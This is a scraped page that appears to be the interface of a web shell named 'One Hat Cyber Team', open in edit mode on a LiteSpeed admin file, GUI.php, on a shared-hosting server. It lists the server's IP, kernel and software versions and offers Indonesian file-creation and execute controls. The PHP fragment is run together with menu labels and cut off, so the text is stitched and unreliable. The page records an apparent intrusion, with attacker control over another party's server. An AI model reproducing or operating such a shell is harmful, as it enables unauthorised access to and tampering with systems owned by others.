⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.140
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
lsws
/
admin
/
html.6.3.2
/
classes
/
ws
/
Edit File: GUI.php
Home
Actions
Graceful Restart
Toggle Debug Logging
Server Log Viewer
Real-Time Stats
Version Manager
Compile PHP
Configuration
Server
Listeners
Virtual Hosts
Virtual Host Templates
Web Console
General
Listeners
Help
'; $ver_link = '/service/serviceMgr.php?vl=3'; $buf = parent::gen_top_menu($dropdown, $ver_link); return $buf; } public static function footer() { $year = '2002-2024'; $buf = parent::gen_footer($year, ''); return $buf; } public static function left_menu() { $confCenter = ConfCenter::singleton(); $conftype = $confCenter->_confType; if($conftype == "admin") { $listeners = count($confCenter->_serv->_data['listeners']); $tabs = array('Admin' => 'admin', "Listeners ($listeners)" => 'altop'); } else { $vhosts = count($confCenter->_info['VHS']); $listeners = count($confCenter->_info['LNS']); $templates = isset($confCenter->_serv->_data['tpTop']) ? count($confCenter->_serv->_data['tpTop']) : 0; $tabs = array('Server' => 'serv', "Listeners ($listeners)" => 'sltop', "Virtual Hosts ($vhosts)" => 'vhtop', "Virtual Host Templates ($templates)" => 'tptop'); } return parent::gen_left_menu($tabs); } }
Simpan